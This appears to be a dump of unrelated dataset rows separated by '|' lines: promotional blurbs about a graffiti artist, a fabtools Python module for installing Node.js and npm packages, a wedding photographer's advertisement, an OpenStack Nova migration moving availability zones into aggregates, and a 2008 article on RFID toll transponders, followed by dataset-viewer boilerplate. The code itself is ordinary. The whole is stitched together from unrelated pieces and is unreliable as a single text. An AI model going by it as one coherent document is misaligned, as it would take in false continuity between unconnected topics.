We recently posted up some photos of our man Kwest creating a massive new installation for the Container Yard in downtown Los Angeles. Here we have a short new video of the man at work, filmed and edited by J Strickland. Peep the vid below!
Toronto graffiti legend Kwest teamed up with Jordan to make an incredible installation for the Jumpman pop up store in Toronto. On display over this past All Star weekend, Kwest dissected a number of sneakers to create a new wall hanging sculpture that resembles a bird spreading its wings.
Canadian graffiti artist Kwest, visited Roskilde Festival 2015 to build the World’s biggest graffiti letter sculpture. Check out the process of creating this monumental piece and see the amazing result he produced for the festival-goers to enjoy during #RF15.
|
"""
Node.js
=======
This module provides tools for installing `Node.js`_ and managing
packages using `npm`_.
.. note:: The ``simplejson`` module is required on Python 2.5.
.. _Node.js: http://nodejs.org/
.. _npm: http://npmjs.org/
"""
try:
import json
except ImportError:
import simplejson as json
from fabric.api import cd, hide, run, settings
from fabtools.system import cpus, distrib_family
from fabtools.utils import run_as_root
DEFAULT_VERSION = '0.10.13'
def install_from_source(version=DEFAULT_VERSION, checkinstall=False, dist_num=None):
    """
    Install Node JS from source.

    If *checkinstall* is ``True``, a distribution package will be built
    instead of running ``make install`` directly.

    Set *dist_num* to control the ``make -j`` parallelism; it must be a
    positive integer. When omitted, ``cpus() + 1`` is used.

    ::

        import fabtools

        # Install Node.js
        fabtools.nodejs.install_nodejs()

    .. note:: This function may not work for old versions of Node.js.

    """
    # BUG FIX: ``abort`` was used below without being imported, raising
    # NameError instead of a clean abort when dist_num was invalid.
    from fabric.api import abort
    from fabtools.require.deb import packages as require_deb_packages
    from fabtools.require.rpm import packages as require_rpm_packages
    from fabtools.require import file as require_file

    # Install the build toolchain appropriate for the target distribution.
    family = distrib_family()

    if family == 'debian':
        packages = [
            'build-essential',
            'libssl-dev',
            'python',
        ]
        if checkinstall:
            packages.append('checkinstall')
        require_deb_packages(packages)

    elif family == 'redhat':
        packages = [
            'gcc',
            'gcc-c++',
            'make',
            'openssl-devel',
            'python',
        ]
        if checkinstall:
            packages.append('checkinstall')
        require_rpm_packages(packages)

    # Download and unpack the source tarball.
    filename = 'node-v%s.tar.gz' % version
    foldername = filename[0:-7]  # strip the '.tar.gz' suffix

    require_file(url='http://nodejs.org/dist/v%(version)s/%(filename)s' % {
        'version': version,
        'filename': filename,
    })
    run('tar -xzf %s' % filename)

    # Determine make parallelism: explicit dist_num wins, otherwise cpus + 1.
    cpus_num = None
    if dist_num:
        if dist_num > 0:
            cpus_num = dist_num
        else:
            abort("dist_num should be positive")
    else:
        cpus_num = cpus() + 1

    if cpus_num:
        with cd(foldername):
            run('./configure')
            run('make -j%d' % cpus_num)
            if checkinstall:
                # BUG FIX: '%(version)' was missing its 's' conversion type,
                # so %-formatting consumed the following ' --' as flags and
                # mangled the checkinstall command line.
                run_as_root('checkinstall -y --pkgname=nodejs --pkgversion=%(version)s '
                            '--showinstall=no make install' % locals())
            else:
                run_as_root('make install')

    # Clean up the tarball and the build directory.
    run('rm -rf %(filename)s %(foldername)s' % locals())
def version(node='node'):
    """
    Get the version of Node.js currently installed.

    Returns ``None`` if it is not installed.
    """
    with settings(hide('running', 'stdout', 'warnings'), warn_only=True):
        output = run('%s --version' % node)
        if output.failed:
            return None
        # Strip the leading 'v' (e.g. 'v0.10.13' -> '0.10.13').
        return output[1:]
def install_package(package, version=None, local=False, npm='npm'):
    """
    Install a Node.js package.

    If *local* is ``True``, the package will be installed locally;
    otherwise it is installed globally (as root, with ``HOME=/root``).

    ::

        import fabtools

        # Install package globally
        fabtools.nodejs.install_package('express')

        # Install package locally
        fabtools.nodejs.install_package('underscore', local=True)

    """
    # Pin a specific version using npm's package@version syntax.
    if version:
        package += '@%s' % version

    if local:
        run('%(npm)s install -l %(package)s' % locals())
    else:
        run_as_root('HOME=/root %(npm)s install -g %(package)s' % locals())
def install_dependencies(npm='npm'):
    """
    Install Node.js package dependencies.

    Runs ``npm install`` in the current remote working directory, which
    locally installs every package listed as a dependency in the
    ``package.json`` file found there.

    ::

        from fabric.api import cd
        from fabtools import nodejs

        with cd('/path/to/nodejsapp/'):
            nodejs.install_dependencies()

    """
    run('%s install' % npm)
def package_version(package, local=False, npm='npm'):
    """
    Get the installed version of a Node.js package.

    Returns ``None`` if the package is not installed. If *local* is
    ``True``, returns the version of the locally installed package.
    """
    # --json gives machine-readable output; --silent suppresses npm noise.
    options = ['--json true', '--silent']
    # -l lists local packages, -g global ones.
    options.append('-l' if local else '-g')
    options = ' '.join(options)

    with hide('running', 'stdout'):
        res = run('%(npm)s list %(options)s' % locals())

    dependencies = json.loads(res).get('dependencies', {})
    pkg_data = dependencies.get(package)
    return pkg_data['version'] if pkg_data else None
def update_package(package, local=False, npm='npm'):
    """
    Update a Node.js package.

    If *local* is ``True``, the package will be updated locally;
    otherwise globally (as root, with ``HOME=/root``).
    """
    if local:
        run('%s update -l %s' % (npm, package))
    else:
        run_as_root('HOME=/root %s update -g %s' % (npm, package))
def uninstall_package(package, version=None, local=False, npm='npm'):
    """
    Uninstall a Node.js package.

    If *local* is ``True``, the package will be uninstalled locally;
    otherwise it is uninstalled globally (as root, with ``HOME=/root``).

    ::

        import fabtools

        # Uninstall package globally
        fabtools.nodejs.uninstall_package('express')

        # Uninstall package locally
        fabtools.nodejs.uninstall_package('underscore', local=True)

    """
    # Target a specific version using npm's package@version syntax.
    if version:
        package += '@%s' % version

    if local:
        run('%(npm)s uninstall -l %(package)s' % locals())
    else:
        run_as_root('HOME=/root %(npm)s uninstall -g %(package)s' % locals())
|
As a member of the SWPP, and with over 10 years' experience in wedding and portrait photography, Sead Kahrimanovic offers professional wedding and portrait photographic services in Perth and all over Scotland. We have photographed in various wedding venues in Perthshire, Dundee, Edinburgh, Glasgow and Aberdeen, just to name a few.
We offer creative, modern and relaxed wedding and portrait photography, if you are looking for a fun and creative photographer please get in touch for a chat.
|
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import String, Column, MetaData, Table, select
""" Remove availability_zone column from services model and replace with
aggregate based zone."""
def upgrade(migrate_engine):
    """Move per-service availability zones into aggregate metadata.

    For every nova-compute row in ``services``: ensure an aggregate exists
    whose metadata has key 'availability_zone' equal to the service's
    ``availability_zone`` value (creating the aggregate and metadata row if
    needed), add the service's host to that aggregate, and finally drop the
    now-redundant ``services.availability_zone`` column.
    """
    meta = MetaData()
    meta.bind = migrate_engine
    services = Table('services', meta, autoload=True)
    aggregates = Table('aggregates', meta, autoload=True)
    aggregate_metadata = Table('aggregate_metadata', meta, autoload=True)
    # migrate data
    record_list = list(services.select().execute())
    for rec in record_list:
        # Only need to migrate nova-compute availability_zones
        if rec['binary'] != 'nova-compute':
            continue
        # if zone doesn't exist create
        # Look for an existing aggregate already tagged with this zone.
        result = aggregate_metadata.select().where(
            aggregate_metadata.c.key == 'availability_zone').where(
            aggregate_metadata.c.value == rec['availability_zone']).execute()
        result = [r for r in result]
        if len(result) > 0:
            # Reuse the aggregate that already represents this zone.
            agg_id = result[0].aggregate_id
        else:
            # No aggregate for this zone yet: create one named after the
            # zone, then attach the 'availability_zone' metadata row to it,
            # carrying over the service row's timestamps/deleted flags.
            agg = aggregates.insert()
            result = agg.execute({'name': rec['availability_zone']})
            agg_id = result.inserted_primary_key[0]
            row = aggregate_metadata.insert()
            row.execute({'created_at': rec['created_at'],
                         'updated_at': rec['updated_at'],
                         'deleted_at': rec['deleted_at'],
                         'deleted': rec['deleted'],
                         'key': 'availability_zone',
                         'value': rec['availability_zone'],
                         'aggregate_id': agg_id,
                         })
        # add host to zone
        agg_hosts = Table('aggregate_hosts', meta, autoload=True)
        # Guard against duplicate membership rows for the same host/aggregate.
        num_hosts = agg_hosts.count().where(
            agg_hosts.c.host == rec['host']).where(
            agg_hosts.c.aggregate_id == agg_id).execute().scalar()
        if num_hosts == 0:
            agg_hosts.insert().execute({'host': rec['host'],
                                        'aggregate_id': agg_id})
    # The zone now lives in aggregate metadata; drop the old column.
    services.drop_column('availability_zone')
def downgrade(migrate_engine):
    """Re-create ``services.availability_zone`` and repopulate it.

    For every nova-compute row in ``services``, look up the
    'availability_zone' aggregate-metadata value of the aggregate that
    contains the service's host, and write it back into the restored
    column (default 'nova').
    """
    meta = MetaData()
    meta.bind = migrate_engine
    services = Table('services', meta, autoload=True)
    aggregate_metadata = Table('aggregate_metadata', meta, autoload=True)
    agg_hosts = Table('aggregate_hosts', meta, autoload=True)

    availability_zone = Column('availability_zone', String(255),
                               default='nova')
    services.create_column(availability_zone)

    # Migrate data back
    # NOTE(jhesketh): This needs to be done with individual inserts as multiple
    # results in an update sub-query do not work with MySQL. See bug/1207309.
    record_list = list(services.select().execute())
    for rec in record_list:
        # Only need to update nova-compute availability_zones
        if rec['binary'] != 'nova-compute':
            continue
        # Find the zone value attached (via aggregate_hosts) to the
        # aggregate this service's host belongs to.
        result = select([aggregate_metadata.c.value],
                    from_obj=aggregate_metadata.join(
                        agg_hosts,
                        agg_hosts.c.aggregate_id == aggregate_metadata.c.aggregate_id
                    )
                ).where(
                    aggregate_metadata.c.key == 'availability_zone'
                ).where(
                    agg_hosts.c.aggregate_id == aggregate_metadata.c.aggregate_id
                ).where(
                    agg_hosts.c.host == rec['host']
                )
        # BUG FIX: the update statement was previously built but never
        # executed, so the restored column silently kept its default for
        # every service. The trailing .execute() actually runs it.
        services.update().values(
            availability_zone=list(result.execute())[0][0]
        ).where(
            services.c.id == rec['id']
        ).execute()
|
The car and truck rental agency would be the first to install TransCore's eZGo Anywhere transponders, which are interoperable with most toll-collection systems.
Dec 23, 2008—Car rental company Avis Budget Group is collaborating with the Highway Toll Administration (HTA), an electronic toll-payment service provider, and RFID technology firm TransCore to begin the deployment of TransCore's eZGo Anywhere RFID transponders in 2009. The transponders will enable customers to pass through toll plazas throughout much of the United States, and be billed at a later date.
According to TransCore, eZGo Anywhere is the first active RFID tag capable of working with nearly all tollway RFID readers around the country, including E-ZPass in the Northeast, Texas' TxTag and Florida's SunPass. The car rental firm—which already provides local electronic toll devices for some of its Avis Rent A Car, Budget Rent A Car and Budget Truck Rental vehicles—intends to have the system in operation at the end of the second quarter of 2009, says Michael Caron, Avis Budget Group's VP of product and program development, as long as the various local toll authorities sign on to the project.
With more than 350,000 vehicles on the road nationwide, Avis Budget Group is the largest car and truck rental company in the United States. For the past three years, it has provided many cars with RFID transponders attached to their windshields that pay tolls at local tollbooths. As a customer pays for a car rental, he or she can also sign up for the eToll system, at a cost of $1.50 per day. With the service, the user provides a credit card number that is then linked to the unique ID number on the car's transponder, and directed to HTA. Each time the user passes through a local tollbooth, the ID number is captured and forwarded to HTA, which then bills that person's credit card company directly.
The eToll system has been well received by Avis Budget Group's customers, Caron says, with more than 50,000 cars equipped with E-ZPass transponders for the Northeast alone, and with 9 million toll events recorded since the company introduced the service in the spring of 2006. However, he notes, the system has shortcomings that the eZGo Anywhere tag would resolve. The various eToll transponders are not interoperable, he explains. At present, E-ZPass is accepted only in Delaware, Illinois, Indiana, Massachusetts, Maryland, Maine, New Hampshire, New Jersey, New York, Pennsylvania, Virginia and West Virginia. So if a vehicle were rented in an E-ZPass state, its transponder would be useless in other regions.
That puts limitations on both customers and Avis Budget, Caron says, since not only is a user confined to eToll payments in a particular region, but the vehicle's eToll tag can not be used by a new driver in another location. In the case of a truck rented in Texas and returned in New England, for instance, Avis Budget would need to change the transponder to an E-ZPass version before the next rental of that vehicle.
In September 2008, TransCore, an RFID and vehicle-tracking product company located in Harrisburg, Pa., debuted its multiprotocol transponder (see RFID News Roundup: TransCore Unveils Tag Designed for Most Toll-Collection Systems). TransCore provides RFID transponders for local agencies, such as Florida's Turnpike Enterprise (FTE), which created the SunPass toll-collection system. The company already had a background in toll-collection RFID technology, says Kelly Gravelle, TransCore's chief technical officer, and had been developing the eZGo Anywhere transponder for approximately a year. The active RFID tag, which operates at 902-928 MHz, has a non-replaceable battery with a life of about 10 years.
The transponder is capable of operating in read-write mode and adjusting its characteristics to meet the protocol needs of each tollway region. For example, in a region in which—for security purposes—the interrogator sends an authentication command, the transponder is capable of receiving that transmission and responding with the appropriate code to verify its authenticity.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.